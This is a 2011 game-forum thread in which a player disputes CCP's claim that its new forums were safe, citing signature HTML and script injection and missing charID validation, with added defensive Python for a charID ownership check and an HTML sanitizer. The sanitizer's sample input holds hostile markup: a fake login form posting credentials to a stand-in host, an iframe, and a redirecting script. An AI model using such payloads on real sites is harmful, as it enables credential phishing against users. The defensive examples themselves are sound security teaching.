
Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 14:54:00 - [1]
Edited by: Helicity Boson on 10/04/2011 14:54:40

You're also being lied to.
While your customer data over at CCP was indeed safe, the new forums put everyone that visited them at risk.
Saying we were completely safe is, demonstrably, FALSE.
I've written up a blog post on the subject here: http://www.machine9.net/blog/?p=592
After posting this, I suspect this will mean goodbye for me, so let me just preemptively state that I will miss you all, and for all your flaws you ARE the best game community in the world.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 16:28:00 - [2]
Edited by: Helicity Boson on 10/04/2011 16:31:30

Originally by: CCP Sreegs
    There are 3 problems with your post.
    A) It's premature, pending investigation but from what I recall though the signatures would allow HTML you could not execute script, which kills a lot of your assertions.

Horsedung. And you know it. Javascript and CSS were confirmed to work.
I appreciate your need to save face, but you guys made an unforgivable screwup; own up to it and instill me with the feeling you guys are deserving of our trust.
And no matter what, that you didn't even see the error in your login design for forum posting and the documented injection holes in the forum you gutted to serve as a base for "your" 72,000 man hour project is pretty damning.
You need peer reviews of code, you need penetration tests.
But most of all you need to get your collective heads out of your "awesome" backsides and start communicating internally and externally.
And above all you need to be honest and forthcoming.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 16:35:00 - [3]
Edited by: Helicity Boson on 10/04/2011 16:38:15

Originally by: CCP Sreegs
    my job is to determine and respond to the problem. Honestly.

I appreciate that, I'm not having a go at you as a person.
These things are some pretty damned basic security risks, and you cannot in good conscience sit there and just blankly state "your account info was not compromised" when that is only a half truth; yeah, your logins were safe, but their browsers weren't.
I'd also really appreciate a devblog detailing how something THIS BASIC could go live like this, and how you are altering peer review procedures to make sure it does not happen again.
I'm not causing a ruckus because I don't like you, I'm doing so because you have let us down, yet again, but you're all still walking around with your head in the clouds of "awesome".
I want you to be the company we deserve, and you are failing.
Also, please don't make me bring up the part of last night where I was explaining how it was done to one of your coworkers via someone with access to your communicator and they didn't, and I quote, "get it."
I'm pretty mad at CCP as a whole, please don't pour fuel on my fire.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 16:44:00 - [4]

Originally by: CCP Sreegs
    My job isn't to make anyone look good, it's to catch bad guys and deal with problems.

Good, so we can look forward to a devblog explaining exactly what changes you are going to make in your structure to make sure something so utterly moronic as not having validation on a charID number will never ever ever occur then?
Because frankly that makes me even more mad than the injection (which is also unforgivable really).
If you do that, then we have a deal.
If, instead, you guys just keep monkeying around and pretend it took 72,000 man hours to chop down an existing forum, break its security and then reskin it, then we're going to be having a problem.
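The post above calls out a missing validation on the charID number used when posting. The thread does not say exactly how the check was missing, so the example below is an added illustration, not CCP's or YAF's code, and it assumes the defect was the common one: the server stored whatever charID the browser submitted without confirming that the character belongs to the logged-in account. The weak handler and the hardened handler sit side by side; the account table, character ids and session object are all constructed for the example.

```python
import logging
from dataclasses import dataclass

log = logging.getLogger("forum.authz")

# Constructed sample data: which characters belong to which account.
# A real forum would look this up in the account database.
ACCOUNT_CHARACTERS = {
    "acct-1001": {90000001, 90000002},
    "acct-2002": {90000003},
}


@dataclass
class Session:
    """Server-side session created at login; the account id is never client-supplied."""
    account_id: str


@dataclass
class Post:
    account_id: str
    char_id: int
    body: str


def create_post_trusting_client(session, char_id, body):
    """Weak pattern (assumed defect): the charID sent by the browser is stored as-is."""
    return Post(session.account_id, char_id, body)


def create_post_checked(session, char_id, body):
    """Hardened pattern: validate the type, then bind charID to the authenticated account."""
    if not isinstance(char_id, int) or isinstance(char_id, bool) or char_id <= 0:
        raise ValueError("charID must be a positive integer")
    owned = ACCOUNT_CHARACTERS.get(session.account_id, set())
    if char_id not in owned:
        # A valid session presenting a character it does not own is a detection signal:
        # a legitimate client never sends this, so log it with enough context to investigate.
        log.warning("charID mismatch account=%s char_id=%d", session.account_id, char_id)
        raise PermissionError("character does not belong to this account")
    return Post(session.account_id, char_id, body)


def attempt(handler, session, char_id, body):
    """Run one handler and summarise the outcome as a string, so both can be compared."""
    try:
        post = handler(session, char_id, body)
    except ValueError:
        return "invalid"
    except PermissionError:
        return "forbidden"
    return f"posted as {post.char_id}"


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    someone_elses_char = 90000001          # belongs to acct-1001
    other = Session("acct-2002")           # logged in, but does not own that character
    print("trusting:", attempt(create_post_trusting_client, other, someone_elses_char, "o/"))
    print("checked: ", attempt(create_post_checked, other, someone_elses_char, "o/"))
```

The point of the comparison is that the charID is only an identifier the client chooses; authorisation has to come from the session's account, and the ownership lookup is what turns "any integer" into "one of my characters". The warning line doubles as a cheap detection hook, since a mismatch cannot occur through the normal posting form.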

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 16:50:00 - [5]

Sean, btw, who do you think Virt was copy/pasting to you last night?

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 16:57:00 - [6]

Originally by: CCP Sreegs
    I'm saying exactly what I said.

You're damned if you do, damned if you don't, mate.
I don't believe for one second your "review" will ever yield any result other than "no we were safe".
Especially since via-via-via-IM I was showing you how the night before and you didn't get it.
You'd never own up to the site being vulnerable anyways, and it's that fact that makes me shudder with revulsion.
Terrible coding practices combined with a willingness to lie make for a grim picture indeed.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 17:04:00 - [7]

Originally by: Bomberlocks
    If that is the case, why did CCP ignore Virtuozzo's and Helicity's attempts to warn you?

To be fair they didn't do that.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 17:12:00 - [8]

Originally by: CCP Sreegs
    or there's a really really hilarious miscommunication chain here.

It's that. But in the scheme of things this is moot.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 17:20:00 - [9]

Originally by: CCP Sreegs
    I did have some information forwarded to me, that was used. But I had no IM convo tmk.

Yeah, that's the info I was giving via an extremely convoluted route, but this is irrelevant to the discussion; I just wanted to make sure you knew where it was coming from and why I'm skeptical of how sincere (and accurate) your blog post will be.
We'll be scrutinizing said blog post very closely, I hope you can find it in yourself to be honest and forthright in it.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 19:20:00 - [10]

I feel a little bad for flaming CCP Sreegs, it really isn't his fault. But you know me, I get all worked up and stuff.
re: bannings.
I do think the ban is appropriate, whereas I only verified it was possible, I didn't go and USE the exploit. I blew the whistle instead, which was the right thing to do.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.10 20:18:00 - [11]

Originally by: Elyssa MacLeod
    whaaaaaaat helicity with a conscience? Tell me you got hacked and this really isn't you

It's more likely than you think.
Heck, it's why I get so wound up to begin with.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.11 16:30:00 - [12]

Originally by: Miilla
    Stable and Secure YAF has been vetted.
    YAF has been around since 2003. During that time, the application has been thoroughly tested. Since the code has been freely available for 7 years, there is nothing to hide and no stone has been left unturned.

You are correct. There's nothing inherently wrong with YAF. The blame for this shameful debacle lies squarely with CCP and their incompetent gutting of a working bit of software.
I'm still not entirely sure how I feel about all this.

Helicity Boson
Amarr The Python Cartel. The Defenders of Pen Island
Posted - 2011.04.12 12:33:00 - [13]

Originally by: Barakkus
    Edited by: Barakkus on 12/04/2011 12:11:57
    Originally by: Kristina Vanszar
        Edited by: Kristina Vanszar on 12/04/2011 10:05:00
        The DEV BLOG, not at risk, sorry guys this must be a joke; as you've said, it was possible to include HTML. Who would prevent me from adding a div which looks exactly like your login one, make it be at the exactly same position as the original one, and gather some login information???
        OR, add a HTML or even Iframe which calls an external script?
        Sorry, but I do not believe that devblog....
        Just as a side tip, PLEASE check that it is not possible to execute server side commands, like SHELLs and stuff....
    The html injection into sigs didn't work so well anyways, I experimented trying to get an image and stuff in my sig while the forums were up and a lot of it got stripped or messed with that broke what I was trying to do anyways.

My associate and I do not fully agree with his assessment about the injection, we're quite sure it was still possible (just not easy).
But for the most part I am content with the blog, we have sent our further concerns to the security email address so they can verify and fix.
This blog is about as good as we're going to get, and it's appropriate and correct from Sreegs's position.
The real reckoning needs to come from higher up, as to how this was even possible, and how 72,000 man hours could yield such an unworthy result.
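The quoted exchange above turns on what signature markup the forum let through: a positioned div imitating the login box, an iframe pulling in external content, and (per earlier posts) working Javascript and CSS. The fix on the defending side is an allowlist sanitizer rather than a blocklist of "bad" tags. The code below is an added example written for this thread, not CCP's or YAF's sanitizer; the tag and attribute policy, the sample signature and the hostnames in it are all constructed here. It drops the whole subtree of script-capable or framing elements, strips every tag that is not explicitly allowed while keeping its text, discards any attribute not on the per-tag allowlist (so `style`, `on*` handlers and the like never survive), and only keeps `href`/`src` values with an http(s) scheme.

```python
import html
from html.parser import HTMLParser

# Allowlist policy (constructed for this example): tag -> attributes permitted on it.
ALLOWED = {
    "b": set(), "i": set(), "u": set(), "br": set(), "p": set(),
    "a": {"href"},
    "img": {"src", "alt"},
}
# Elements whose entire contents are discarded, not just the tag itself.
DROP_SUBTREE = {"script", "style", "iframe", "form", "object", "embed", "textarea", "select"}
URL_ATTRS = {"href", "src"}
SAFE_URL_PREFIXES = ("http://", "https://")
VOID = {"br", "img"}


class SignatureSanitizer(HTMLParser):
    """Re-serialises input markup keeping only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.drop_stack = []   # names of DROP_SUBTREE elements we are currently inside
        self.rejected = []     # tag names removed, useful for logging or alerting

    def handle_starttag(self, tag, attrs):
        if self.drop_stack:                      # inside a dropped subtree: ignore everything
            return
        if tag in DROP_SUBTREE:
            self.drop_stack.append(tag)
            self.rejected.append(tag)
            return
        if tag not in ALLOWED:                   # unknown tag: strip it, keep its text
            self.rejected.append(tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name not in ALLOWED[tag]:
                continue                         # style=, onerror=, etc. never get here
            if name in URL_ATTRS and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                continue                         # javascript:, data:, relative tricks dropped
            kept.append(f' {name}="{html.escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.drop_stack:
            if tag == self.drop_stack[-1]:
                self.drop_stack.pop()
            return
        if tag in ALLOWED and tag not in VOID:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.drop_stack:
            self.out.append(html.escape(data, quote=False))   # re-escape text content


def sanitize_signature(raw_html):
    """Return (clean_html, rejected_tags) for an untrusted signature string."""
    p = SignatureSanitizer()
    p.feed(raw_html)
    p.close()
    return "".join(p.out), p.rejected


# Constructed sample signature mirroring the cases discussed in the thread.
SAMPLE = (
    '<b>Fly safe</b> <a href="https://example.invalid/blog">blog</a>'
    '<div style="position:absolute;top:0;left:0">'
    '<form action="https://untrusted.invalid/collect"><input name="user"><input name="pass"></form></div>'
    '<iframe src="https://untrusted.invalid/x"></iframe>'
    '<img src="javascript:alert(1)" onerror="alert(1)" alt="sig">'
    '<script>document.location="https://untrusted.invalid/"</script>'
)

if __name__ == "__main__":
    clean, rejected = sanitize_signature(SAMPLE)
    print(clean)
    print("rejected:", rejected)
```

Two design points matter here. First, re-serialising from a parse tree means the output is built from the policy, so a malformed tag that a regex-based stripper would miss never reaches the output. Second, the `rejected` list is worth logging: a signature submission containing `script`, `iframe` or `form` is not something a normal user produces, so the same code that neutralises the content also gives the operations team a signal to look at.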